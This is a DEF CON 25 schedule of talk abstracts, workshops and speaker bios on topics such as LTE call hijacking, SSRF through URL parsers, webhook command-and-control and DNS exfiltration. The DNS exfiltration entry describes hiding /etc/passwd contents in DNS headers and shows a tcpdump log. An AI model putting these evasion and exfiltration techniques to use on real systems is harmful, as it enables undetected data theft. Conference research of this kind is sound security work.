Talk/Event Descriptions


 

DEFCON - Track 4 - Sunday - 11:00-11:45


'Ghost Telephonist' Impersonates You Through LTE CSFB

Sunday at 11:00 in Track 4

45 minutes | Exploit

Yuwei Zheng Hacker

Lin Huang Hacker

One vulnerability in CSFB (Circuit Switched Fallback) in 4G LTE network will be presented. In the CSFB procedure, we found the authentication step is missing. This results in that an attacker can hijack the victim's communication. We named this attack as 'Ghost Telephonist'. Several exploitations can be made based on this vulnerability. When the call or SMS is not encrypted, or weakly encrypted, the attacker can impersonate the victim to receive the "Mobile Terminated" calls and messages or to initiate the "Mobile Originated" calls and messages. Furthermore, Telephonist Attack can obtain the victim's phone number and then use the phone number to make advanced attack, e.g. breaking Internet online accounts. These attacks can randomly choose victims, or target a given victim. We verified these attack with our own phones in operators' network in a small controllable scale. The experiments proved the vulnerability really exists. The attack doesn't need fake base station so the attack cost is low. The victim doesn't sense being attacked since no fake base station and no cell re-selection. Now we are collaborating with operators and terminal manufactures to fix this vulnerability.

Yuwei Zheng
Yuwei Zheng is a senior security researcher from Radio Security Research Dept. of 360 Technology. He has rich experiences in embedded systems over 10 years. He reversed blackberry BBM, PIN, BIS push mail protocol, and decrypted the network stream successfully in 2011. He successfully implemented a MITM attack for Blackberry BES based on a modified ECMQV protocol of RIM. He focuses on the security issues of embedded hardware and IOT systems. He was the speaker of DEF CON , HITB etc.

@huanglin_bupt

Lin Huang
Lin HUANG is a wireless security researcher and SDR technology expert, from Radio Security Research Dept. of 360 Technology. Her interests include the security issues in wireless communication, especially the cellular network security. She was the speaker of some security conferences, DEF CON , HITB, POC etc. She is the 3GPP SA3 delegate of 360 Technology.


Contributor Acknowledgement:

The Speakers would like to acknowledge Qing YANG, for his contribution to the presentation. Qing YANG is the founder of UnicornTeam & Radio Security Research Department in 360 Technology. He has rich experiences in information security area. He made presentations at BlackHat, DEF CON , CanSecWest, HITB, Ruxcon, POC, XCon, China ISC etc.


Return to Index      -     

 

DEFCON - Track 1 - Sunday - 15:00-15:45


25 Years of Program Analysis

Sunday at 15:00 in 101 Track

45 minutes | Hacker History, Demo

Zardus (Yan Shoshitaishvili) Assitant Professor, Arizona State University

Last year, DARPA hosted the Cyber Grand Challenge, the culmination of humanity's research into autonomous detection, exploitation, and mitigation of software vulnerabilities. Imagine the CGC from the outside: huge racks of servers battling it out on stage, throwing exploit after exploit at each other while humans watch helplessly from the sidelines. But that vantage point misses the program analysis methods used, the subtle trade-offs made, and the actual capabilities of these systems. It also misses why, outside of the controlled CGC environment, most automated techniques don't quite scale to the analysis of real-world software!

This talk will provide a better perspective. On the 25th anniversary of DEFCON, we will go through these last 25 years of program analysis. We'll learn about the different disciplines of program analysis (and learn strange terms such as static, dynamic, symbolic, and abstract), understand the strength and drawbacks of each, and see if, and to what extent, they are used in the course of actual vulnerability analysis.

Did you know that every finalist system in the Cyber Grand Challenge used a combination of dynamic analysis and symbolic execution to find vulnerabilities, but used static analysis to patch them? Why is that? Did you know that, to make the contest feasible for modern program analysis techniques, the CGC enforced a drastically-simplified OS model? What does this mean for you, if you want to use program analysis while finding vulns and collecting bug bounties? Come to this talk, become an expert, and go on to contribute to the future of program analysis!

Zardus (Yan Shoshitaishvili)
Zardus is one of the hacking aces on Shellphish, the oldest-running CTF team in the world. He's been attending DEFCON since 2001, playing DEFCON CTF since 2009, and talking at DEFCON since 2015. Through this time, he also pursued a PhD in Computer Security, focusing on Program Analysis. The application of cutting-edge academic program analysis techniques to CTF (and, later, to his participation in the DARPA Cyber Grand Challenge, where he led Shellphish to a 3rd-place victory and a big prize payout) gave Zardus a unique understanding of the actual capabilities of the state of the art of program analysis, which in turn drove his research and culminated in the release of the angr binary analysis framework and the Mechanical Phish, one of the world's first autonomous Cyber Reasoning Systems.


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 12:00-12:45


Are all BSDs are created equally? A survey of BSD kernel vulnerabilities.

Sunday at 12:00 in Track 2

45 minutes | Demo

Ilja van Sprundel Director of penetration testing, IOActive

In this presentation I start off asking the question "How come there are only a handful of BSD security kernel bugs advisories released every year?" and then proceed to try and look at some data from several sources. It should come as no surprise that those sources are fairly limited and somewhat outdated.

The presentation then moves on to try and collect some data ourselves. This is done by actively investigating and auditing. Code review, fuzzing, runtime testing on all 3 major BSD distributions [NetBSD/OpenBSD/FreeBSD]. This is done by first investigating what would be good places where the bugs might be. Once determined, a detailed review is performed of these places. Samples and demos will be shown.

I end the presentation with some results and conclusions. I will list what the outcome was in terms of bugs found, and who -based on the data I now have- among the 3 main BSD distributions can be seen as the clear winner and loser. I will go into detail about the code quality observed and give some pointers on how to improve some code. Lastly I will try and answer the question I set out to answer ("How come there are only a handful of BSD security kernel bugs advisories released every year?").

Ilja van Sprundel
Ilja van Sprundel is experienced in exploit development and network and application testing. As IOActive's Director of Penetration Testing, he performs primarily gray-box penetration testing engagements on mobile (specializing in iOS) and runtime (specializing in Windows kernel) applications that require customized fuzzing and source code review, identifying system vulnerabilities, and designing custom security solutions for clients in technology development telecommunications, and financial services. van Sprundel specializes in the assessment of low-level kernel code and architecture/infrastructure design, having security reviewed literally hundreds of thousands of lines of code. However, as a Director, he also functions in a managerial capacity by overseeing penetration testing engagements, providing oversight regarding technical accuracy, serving as the point of contact between technical consultants and technical stakeholders, and ensuring that engagements are delivered on time and in alignment with customer's expectations. van Sprundel also is responsible to mentor and guide Associate-level consultants as they grow both their penetration testing and general consulting skillsets. He is the driver behind the team's implementation of cutting-edge techniques and tools, guided by both research and successful exploits performed during client engagements.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 15:10-15:59


Modern Day CovertTCP with a Twist

Mike Raggo, CSO at 802 Secure, Inc.
Chet Hosmer, Owner of python-forensics.org

Taking a modern day look on the 20 year anniversary of Craig Rowland's article on Covert TCP, we explore current day methods of covert communications and demonstrate that we are not much better off at stopping these exploits as we were 20 years ago. With the explosion of networked devices using a plethora of new wired and wireless protocols, the covert communication exploit surface is paving new paths for covert data exfiltration and secret communications. In this session, we will explore uPnP, Zigbee, WiFi, P25, Streaming Audio Services, IoT, and much more. Through real-world examples, sample code, and demos; we bring to light this hidden world of concealed communications.

Mike Raggo (Twitter: @MikeRaggo) Chief Security Officer, 802 Secure (CISSP, NSA-IAM, ACE, CSI) has over 20 years of security research experience. His current focus is wireless IoT threats impacting the enterprise. Michael is the author of “Mobile Data Loss: Threats and Countermeasures” and “Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols” for Syngress Books, and contributing author for “Information Security the Complete Reference 2nd Edition”. A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS and PCI, and is a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.

Chet Hosmer (Twitter: @ChetHosmer) is the Founder of Python Forensics, Inc. a non-profit organization focused on the collaborative development of open-source investigative technologies using the Python programming language. Chet is also the founder of WetStone Technologies, Inc. and has been researching and developing technology and training surrounding forensics, digital investigation and steganography for over two decades. He has made numerous appearances to discuss emerging cyber threats including National Public Radio's Kojo Nnamdi show, ABC's Primetime Thursday, NHK Japan, CrimeCrime TechTV and ABC News Australia. He has also been a frequent contributor to technical and news stories relating to cyber security and forensics and has been interviewed and quoted by IEEE, The New York Times, The Washington Post, Government Computer News, Salon.com and Wired Magazine. He is the author of three recent Elsevier/Syngress Books: Python Passive Network Mapping, Python Forensics, and Data Hiding. Chet serves as a visiting professor at Utica College where he teaches in the Cybersecurity Graduate program. He is also an Adjunct Faculty member at Champlain College in the Masters of Science in Digital Forensic Science Program. Chet delivers keynote and plenary talks on various cyber security related topics around the world each year.


Return to Index      -     

 

Night Life - Chillout Lounge, Roman 3, Promenade Level - Friday - 18:00-20:00


Title:
"DCG" Mixer

Come meet the DEF CON Groups organizers after their talk ( 17:00 - 17:45 in Track 2 ) on Friday. This DEF CON Groups mixer is for all who are, or want to become, members of local DEF CON Groups. Come to get info, meet peers, and get some DCG swag. There will be a limited about of free beer via kegs courtesy of The Dark Tangent. Join us Friday evening to meet fellow DCG organizers and members from all over the world. Tell us what make your group work, or doesn't, or just raise a glass with like minded hackers. See you there!
Return to Index      -     

 

DEFCON - Track 4 - Friday - 16:00-16:45


"Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC

Friday at 16:00 in Track 4

45 minutes

Whitney Merrill Privacy, eCommerce & Consumer Protection Counsel, Electronic Arts

Terrell McSweeny Commissioner, Federal Trade Commission

The Federal Trade Commission is a law enforcement agency tasked with protecting consumers from unfair and deceptive practices. Protecting consumers on the Internet and from bad tech is nothing new for the FTC. We will take a look back at what the FTC was doing when DEF CON first began in 1993, and what we've been doing since. We will discuss enforcement actions involving modem hijacking, FUD advertising, identity theft, and even introduce you to Dewie the e-Turtle. Looking forward, we will talk about the FTC's future protecting consumers' privacy and data security and what you can do to help.

Whitney Merrill
Whitney Merrill is a hacker, ex-fed, and lawyer. She's currently a privacy attorney at Electronic Arts (EA), and in her spare time, she runs the Crypto & Privacy Village (come say hi!). Recently, she served her country as an attorney at the Federal Trade Commission where she worked on a variety of consumer protection matters including data security, privacy, and deceptive marketing and advertising. Whitney received her J.D. and master's degree in Computer Science from the University of Illinois at Urbana-Champaign.

@wbm312

Terrell McSweeny
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. This year marks her fourth time at DEF CON . When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics design - but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.

@TMcSweenyFTC


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 10:20-10:40


(Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging.

Saturday at 10:20 in Track 4

20 minutes | Hacker History, Art of Defense, Demo, Tool

K2 Director, IOACTIVE

How to forensic, how to fuck forensics and how to un-fuck cyber forensics.

Defense: WTF is a RoP, why I care and how to detect it statically from memory. Counteract "Gargoyle" attacks.

Defense: For one of DEF CON 24's more popular anti-forensics talks (see int0x80 - Anti Forensics). In memory (passive debugging) techniques that allows for covert debugging of attackers (active passive means that we will (try hard to) not use events or methods that facilities are detectable by attackers).

Offense: CloudLeech - a cloud twist to Ulf Frisk Direct Memory Attack

K2
K2 (w00w00, ADM, undernet, efnet, The Honeynet Project) is a devil in the details person who does not take themselves too serious and appreciates a good laugh. Earlier DEF CON presentations included polymorphic shellcode in the form of ADMMutate (see ADM Crew), low-level process detection, with page table analysis (Weird-Machine motivated shell code) and using the branch tracing store backdoor trick on Windows to counter Ransom ware, detect RoP (RunTime + HW Assisted) and draw cool graphs — "BlockFighting with a Hooker: BlockfFghter2!". All three of these are open source tools available github.com/K2 (EhTrace and inVtero.Net are under active development).

@ktwo_K2
GitHub: https://github.com/K2


Return to Index      -     

 

DEFCON - Track 2 - Saturday - 10:00-10:45


$BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning?

Saturday at 10:00 in Track 2

45 minutes

Cory Doctorow craphound.com, science fiction author, activist, journalist and blogger.

Is Net Neutrality on the up or down? Is DRM rising or falling? Is crypto being banned, or will it win, and if it does, will its major application be ransomware or revolution? Is the arc of history bending toward justice, or snapping abruptly and plummeting toward barbarism?

It's complicated.

A better world isn't a product, it's a process. The right question isn't, "Does the internet make us better or worse," its: "HOW DO WE MAKE AN INTERNET THAT MAKES THE WORLD BETTER?" We make the world better with code, sure, but also with conversations, with businesses, with lawsuits and with laws.

We don't know how to get to a better world, but we know which direction it's in, and we know how to hill-climb towards it. If we keep heading that way, we'll get *somewhere*. Somewhere good. Somewhere imperfect. Somewhere where improvement is possible.

Cory Doctorow
Cory Doctorow (craphound.com) is a science fiction author, activist, journalist and blogger - the co-editor of Boing Boing (boingboing.net) and the author of WALKAWAY, a novel for adults, a YA graphic novel called IN REAL LIFE, the nonfiction business book INFORMATION DOESN'T WANT TO BE FREE, and young adult novels like HOMELAND, PIRATE CINEMA and LITTLE BROTHER and novels for adults like RAPTURE OF THE NERDS and MAKERS. He works for the Electronic Frontier Foundation, is a MIT Media Lab Research Affiliate, is a Visiting Professor of Computer Science at Open University and co-founded the UK Open Rights Group. Born in Toronto, Canada, he now lives in Los Angeles.

@doctorow


Return to Index      -     

 

IOT - Main Contest Area - Friday - 17:40-18:30



Return to Index      -     

 

Night Life - Promenade level, in Skytalks room. - Friday - 22:30-27:00


Title:
303 Party

Hosted and produced by the hacker collective simply known as 303. This event needs no introduction...really. See you there!
Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Thursday - 10:30-14:30


A B C of Hunting

Thursday, 10:30 to 14:30 in Octavius 1

Julian Dana Mandiant / FireEye

We heard it all before. The old school SOC/CIRTs is not enough to fight the sophisticated attacks we see these days; being reactive to alerts and the known BAD model is not cutting it anymore. We need to move forward -> the CDC (Cyber Security Center) or the SOC/CIRT 2.0+, extra, super, plus! And, that means making the changes to become: Proactive, Predictive and Reactive too. And for that you need to start the HUNTING! .... BUT what is that? How do I do it? Where do I start? Which is the simplest for me as an analyst? Logs? Intelligence?

Let's start from the ABC... We will cover the theory and a few practical LABs. How to map the active Hunting to the Attack LyfeCycle. We will talk about the IOCs, Frequency Analysis (stacking). Intel driven LAB. And lastly ask you to use your imagination to create your own Hunting case.

Please get ready to talk, as it is going to be interactive (I'm not expecting to be the only one talking).

Prerequisites: Basic Incident Response knowledge. Basic security architecture knowledge. Basic log review knowledge. Basic OS knowledge.

Materials: The attendees should bring a laptop or a VM running Windows 7 or above with 2GB of RAM (4+ GB would be better) with connection to the Internet (the one provided by DEF CON works perfectly). Software: Spreadsheet editor, favorite text editor or log viewer. Admin rights to be able to install software if required.

Max students: 36 | Registration: https://dc25_dana.eventbrite.com (Sold out!)

Julian Dana
Julian is a Professional Services Director at Mandiant (a FireEye company). He has experience teaching IR, Network Investigations and other trainings. During his carrier, he has developed SOC/CIRTs, performed many penetration tests, responded to security breaches and worked on strategical security engagements for International Companies and Government institutions.


Return to Index      -     

 

DEFCON - Track 3 - Friday - 12:00-12:45


A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!

Friday at 12:00 in Track 3

45 minutes | Demo, Tool, Exploit

Orange Tsai Security Consultant from DEVCORE

We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.

Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.

Understanding the basics of this technique, the audience won't be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.

Orange Tsai
Cheng-Da Tsai, also as known as Orange Tsai, is member of DEVCORE and CHROOT from Taiwan. Speaker of conference such as HITCON, WooYun and AVTokyo. He participates numerous Capture-the-Flags (CTF), and won 2nd place in DEF CON 22 as team member of HITCON.

Currently focusing on vulnerability research & web application security. Orange enjoys to find vulnerabilities and participates Bug Bounty Program. He is enthusiasm for Remote Code Execution (RCE), also uncovered RCE in several vendors, such as Facebook, Uber, Apple, GitHub, Yahoo and Imgur.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 15:00-16:00


Title:
A New Political Era: Time to start wearing tin-foil hats following the 2016 elections?

Author:
Joel Wallenstrom
Robby Mook

Abstract:
The most trivial communications were weaponized and drastically changed the course of the 2016 elections right before our eyes. As a result, information security is now a number one priority for all political campaigns domestic and international. Yet many in the political community, including France, the UK, and the US, are deploying the same old practices, tools, and user training for communicating highly-sensitive information. In addition to continuing to hoard high-target data, political parties and candidates are reluctant to change behaviors and ask for help. Admitting to being hacked has become increasingly stigmatized, preventing under-resourced campaigns and the policy community from understanding how to deal with persistent and well-funded adversaries.

What have we learned and how likely is it that this will happen to election campaigns again? This talk will provide a first-hand context for understanding the exact political, media and security environments in which multiple breaches were detected on the democratic side of the 2016 campaign and how they went unmitigated for months. The talk will then trace how, in the aftermath, the affected parties have attempted, successfully or not, to recover and learn to work with the infosec community. We will also touch on what impact product decisions in the tech and security space have on ordinary users ability to do their work, including running national campaigns. Finally, the talk will touch on ephemerality becoming a number one behavioral change the victims of the election hacking seek as an antidote to information weaponization.

Bio:
Joel Wallenstrom is the CEO of Wickr, a secure communications company building peer-to-peer encrypted ephemeral messaging and collaboration platforms. Prior to joining Wickr, Joel co-founded and led several top white-hat hacker teams including iSEC Partners and NCC Group, renowned for their cutting edge independent security research and incident response in high-profile cases. Joel also served as Director for Strategic Alliances at @stake.

Robby Mook is a former campaign manager for a $1 billion start-up called HFACC, Inc., more commonly known as Hillary for America. Robby successfully ran the Virginia gubernatorial campaign for Terry McAuliffe, served as an organizer for Barack Obama's 2008 team in Nevada, Indiana, and Ohio while working for Hillary Clinton's first campaign and leading the Democratic Congressional Campaign Committee.
Twitter handle of presenter(s): @RobbyMook @mywickr
Website of presenter(s) or content: wickr.com

Return to Index      -     

 

DEFCON - Track 4 - Saturday - 13:00-13:45


A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego

Saturday at 13:00 in Track 4

45 minutes | Tool

Philip Tully Principal Data Scientist, ZeroFOX

Michael T. Raggo Chief Security Officer, 802 Secure

Images, videos and other digital media provide a convenient and expressive way to communicate through social networks. But such broadcastable and information-rich content provides ample illicit opportunity as well. Web-prevalent image files like JPEGs can be disguised with foreign data since they're perceivably robust to minor pixel and metadata alterations. Slipping a covert message into one of the billions of daily posted images may be possible, but to what extent can steganography be systematically automated and scaled?

To explore this, we first report the distorting side effects rendered upon images uploaded to popular social network servers, e.g. compression, resizing, format conversion, and metadata stripping. Then, we build a convolutional neural network that learns to reverse engineer these transformations by optimizing hidden data throughput capacity. From pre-uploaded and downloaded image files, the network learns to locate candidate metadata and pixels that are least modifiable during transit, allowing stored hidden payloads to be reliably recalled from newly presented images. Deep learning typically requires tons of training data to avoid over fitting. But data acquisition is trivial using social networks' free image hosting services, which feature bulk uploads and downloads of thousands of images at a time per album.

We show that hidden data can be predictably transmitted through social network images with high fidelity. Our results demonstrate that AI can hide data in plain sight, at large-scale, beyond human visual discernment, and despite third-party manipulation. Steganalysis and other defensive forensic countermeasures are notoriously difficult, and our exfiltration techniques highlight the growing threat posed by automated, AI-powered red teaming.

Philip Tully
Philip Tully is a Principal Data Scientist at ZeroFOX. He employs natural language processing and computer vision techniques in order to develop predictive models for combating security threats emanating from social networks. He earned his joint doctorate degree in computer science from the Royal Institute of Technology (KTH) and the University of Edinburgh, and has spoken at Black Hat, DEF CON , ShowMeCon and across the neuroscience conference circuit. He's a hackademic that's interested in applying brain-inspired algorithms to both blue and red team operations.

@phtully

Michael T. Raggo
Michael T. Raggo, Chief Security Officer, 802 Secure (CISSP, NSA-IAM, CSI) has over 20 years of security research experience. His current focus is wireless IoT threats impacting the enterprise. Michael is the author of "Mobile Data Loss: Threats & Countermeasures" and "data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols" for Syngress Books, and contributing author for "Information Security the Complete Reference 2nd Edition". A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS and PCI, and is a frequent presenter at security conferences, including Black Hat, DEF CON , Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Saturday - 18:00-18:25


Darren Kitchen

Bio

Darren Kitchen is the founder of Hak5, the award winning Internet television show inspiring hackers and enthusiasts since 2005. Breaking out of the 90s phone phreak scene, he has continued contributing to the hacker community as a speaker, instructor, author and developer of leading penetration testing tools.

@hak5darren

Sebastian Kinne

Bio

Sebastian Kinne has lead software development at Hak5 since 2011. His background in embedded systems and reverse engineering has been instrumental in the success of the WiFi Pineapple, the popular WiFi auditing tool. As an instructor and speaker on WiFi security, chances are he's sniffed your packets in a demo or two.

@sebkinne

A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar

Abstract

A Pineapple, a Turtle, a Bunny and a Squirrel walk into a bar. Seriously. It has been a big year for the fruity team behind the WiFi Pineapple. No, that doesn't sound right. It's been a big year for Hak5. We've been working on new wireless initiatives, some out-of-band covert channel goodness, and something called a squirrel. One might say we're nuts. Join Darren Kitchen and Sebastian Kinne of famed pentesting tools and get a peek into what's right around the corner.


Return to Index      -     

 

SEV - Emperors BR II - Saturday - 17:30-18:20



Saturday July 29 5:30PM 50 mins
….Not lose the common touch
Building rapport is essential in life, and critical in Social Engineering. A lesson learned while tending bar on the Las Vegas Strip taught me something that everyone has in common: Everybody is from somewhere. Find out how to use this idea on engagements and in everyday life.

Billy Boatright: @fuzzy_l0gic
Billy began his social engineering career without even knowing it.  He was a bartender on the Las Vegas Strip for the better part of a decade.  He won numerous awards from all over the world as a Top-ranked Flair Bartender.  He has taken the skills he learned behind the bar to the Information Security world.  Billy has been a Judge for the Social Engineering Capture the Flag event at Defcon.  He is also the namesake for the BSides Las Vegas Social Engineering Capture the Flag Championship Belt.  Billy also volunteers time and expertise to the Las Vegas ISSA Chapter as a Board Member.  He is also a member of the BSides Las Vegas Senior Staff.

Billy has multiple degrees and numerous certifications.  However, when asked about them he will gladly quote George Moriarty, “The shining trophies on our shelves can never win tomorrow’s game.”


Return to Index      -     

 

DEFCON - Track 4 - Friday - 15:00-15:45


Abusing Certificate Transparency Logs

Friday at 15:00 in Track 4

45 minutes | Demo, Tool

Hanno Böck Hacker and freelance journalist

The Certificate Transparency system provides public logs of TLS certificates. While Certificate Transparency is primarily used to uncover security issues in certificates, its data is also valuable for other use cases. The talk will present a novel way of exploiting common web applications like Wordpress, Joomla or Typo3 with the help of Certificate Transparency.

Certificate Transparency has helped uncover various incidents in the past where certificate authorities have violated rules. It is probably one of the most important security improvements that has ever happened in the certificate authority ecosystem. In September 2017 Google will make Certificate Transparency mandatory for all new certificates. So it's a good time to see how it could be abused by the bad guys.

Hanno Böck
Hanno Böck is a hacker and freelance journalist. He regularly covers IT security issues for the German IT news site Golem.de and publishes the monthly Bulletproof TLS Newsletter. He also runs the Fuzzing Project, an effort to improve the security of free and open source software supported by the Linux Foundation's Core Infrastructure Initiative.

@hanno


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 14:30-15:30


Abusing Smart Cars with QR codes

No description available


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 11:20-11:40


Abusing Webhooks for Command and Control

Saturday at 11:20 in 101 Track

20 minutes | Demo, Tool

Dimitry Snezhkov Security Consultant, X-Force Red, IBM

You are on the inside of the perimeter. And maybe you want to exfiltrate data, download a tool, or execute commands on your command and control server (C2). Problem is - the first leg of connectivity to your C2 is denied. Your DNS and ICMP traffic is being monitored. Access to your cloud drives is restricted. You've implemented domain fronting for your C2 only to discover it is ranked low by the content proxy, which is only allowing access to a handful of business related websites on the outside.

We have all been there, seeing frustrating proxy denies or triggering security alarms making our presence known.
Having more choices when it comes to outbound network connectivity helps. In this talk we'll present a technique to establish such connectivity with the help of HTTP callbacks (webhooks). We will walk you through what webhooks are, how they are used by organizations. We will then discuss how you can use approved sites as brokers of your communication, perform data transfers, establish almost realtime asynchronous command execution, and even create a command-and-control communication over them, bypassing strict defensive proxies, and even avoiding attribution.

Finally, we'll release the tool that will use the concept of a broker website to work with the external C2 using webhooks.

Dimitry Snezhkov
Dimitry Snezhkov does not like to refer to himself in the third person ;) but when he does he is a Sr. Security Consultant for X-Force Red at IBM, currently focusing on offensive security testing, code hacking and tool building.

@Op_Nomad


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 14:00-14:59


Title:
Advanced DNS Exfil

1400 Friday
Nolan and Cory
Advanced DNS Exfil

"Our previous demonstration used base64-encoded subdomains to exfiltrate data. It created long subdomains that might look unusual to an analyst and was detectable if you were to look for domains that had very high numbers of unique subdomains.

This method, although slower in throughput, is is less detectable by frequency analysis using tools such as elk stack. The reason for this is that data is encoded into the DNS header rather than resource sections of the packet. The query can be a the authoritative domain name if exfiltration should need to pass through caches. If the client has direct access to port 53, however, any domain name can be specified as it is totally ignored by the exfiltration process.

In the example above, I am directly querying the evil DNS using common domain names bing.com, yahoo.com and google.com. The evil dns server responds with the correct A record response, while at the same time reproducing the contents of /etc/passwd.

While that is going on, tcpdump appears to show normal-looking traffic with accurate responses.

19:58:39.298908 IP 127.0.0.1.53 > 127.0.0.1.43371: 25967 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.299534 IP 127.0.0.1.47467 > 127.0.0.1.53: 25964+ A? bing.com. (26)
19:58:39.300673 IP 10.0.1.39.49825 > 8.8.8.8.53: 25964+ A? bing.com. (26)
19:58:39.321210 IP 8.8.8.8.53 > 10.0.1.39.49825: 25964 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.321828 IP 127.0.0.1.53 > 127.0.0.1.47467: 25964 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.322258 IP 127.0.0.1.58465 > 127.0.0.1.53: 25967+ A? yahoo.com. (27)
19:58:39.322991 IP 10.0.1.39.46677 > 8.8.8.8.53: 25967+ A? yahoo.com. (27)
19:58:39.343705 IP 8.8.8.8.53 > 10.0.1.39.46677: 25967 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.344408 IP 127.0.0.1.53 > 127.0.0.1.58465: 25967 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.344872 IP 127.0.0.1.55726 > 127.0.0.1.53: 25959+ A? yahoo.com. (27)
19:58:39.345549 IP 10.0.1.39.39783 > 8.8.8.8.53: 25959+ A? yahoo.com. (27)
19:58:39.393440 IP 8.8.8.8.53 > 10.0.1.39.39783: 25959 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.394173 IP 127.0.0.1.53 > 127.0.0.1.55726: 25959 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.394902 IP 127.0.0.1.51405 > 127.0.0.1.53: 25961+ A? google.com. (28)
19:58:39.395784 IP 10.0.1.39.37965 > 8.8.8.8.53: 25961+ A? google.com. (28)
19:58:39.410372 IP 8.8.8.8.53 > 10.0.1.39.37965: 25961 1/0/0 A 172.217.5.110 (44)
19:58:39.411103 IP 127.0.0.1.53 > 127.0.0.1.51405: 25961 1/0/0 A 172.217.5.110 (44)



As far as I know no one has done much DNS Exfil work without the use of subdomains so I believe this is somewhat new."

Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Saturday - 18:15-19:30


Advanced Implant Detection with Bro and PacketSled

Aaron Eppert, Director of Engineering for PacketSled

With the release Double Pulsar by the Shadow Brokers malicious software ranging from EternalBlue, WannaCry, to the more recent (Not)Peyta cyberattacks have necessitated a deeper understanding of the SMB protocol found in virtually every network in the world. Given the extreme complexity of SMB it is very easy for C&C activity to go undetected due to the shear signal-to-noise ratio present in the protocol and the high volume of activity that it generates on a network without malicious activity being present. For this PacketSled extended the SMB analyzer in Bro to facilitate the detection of, what would generally be, anomalous behavior of the protocol itself, bringing the noise floor down and allowing for the detection of anomalous activity.

What is Bro? Bro is a powerful network analysis framework that allows for customized development via an internal scripting language that allows the creation of highly powerful detections via metadata extraction events.

Aaron Eppert (Twitter: @aeppert) is the Director of Engineering and lead developer of PacketSled’s core Sensor technology. Aaron has commits to the Bro Core project and resurrected the SMB Analyzer from the depths of a feature branch and has since extended it for the purposes of finding modern malware. Additionally, Aaron has two decades of experience reverse engineering network protocols and malware as well as developing as well as developing low-level software in a range of languages. Aaron has developed and presented Bro-centric trainings to Fortune 500 companies, and government organizations.


Return to Index      -     

 

Demolabs - Table 1 - Saturday - 16:00-17:50


Advanced Spectrum Monitoring with ShinySDR

Michael Ossmann

Dominic Spill

Saturday from 1600-1750 at Table One

Audience: Wireless, Defense

We have developed open source tools to monitor the RF spectrum at a high level and then drill down to individual signals, supporting both reverse engineering and signals intelligence. By automatically combining the results with OSINT data from regulatory bodies around the world, we are able to build up a picture of devices transmitting in an environment.

http://greatscottgadgets.com/spectrummonitoring

Michael Ossmann
Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

Dominic Spill
Dominic Spill is senior security researcher for Great Scott Gadgets. The US government recently labelled him as "extraordinary." This has gone to his head.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Friday - 14:30-18:30


Advanced Wireless Attacks Against Enterprise Networks

Friday, 14:30 to 18:30 in Octavius 7

Gabriel Ryan Security Consultant, Gotham Digital Science

This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Students will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and explore how wireless can be leveraged as a powerful means of lateral movement through an Active Directory environment.

Topics of interest include:

- Wireless Reconnaissance and Target Identification Within A Red Team Environment
- Attacking and Gaining Entry to WPA2-EAP wireless networks
- SMB Relay Attacks and LLMNR/NBT-NS Poisoning
- Data Manipulation and Browser Exploitation Using Wireless MITM Attacks
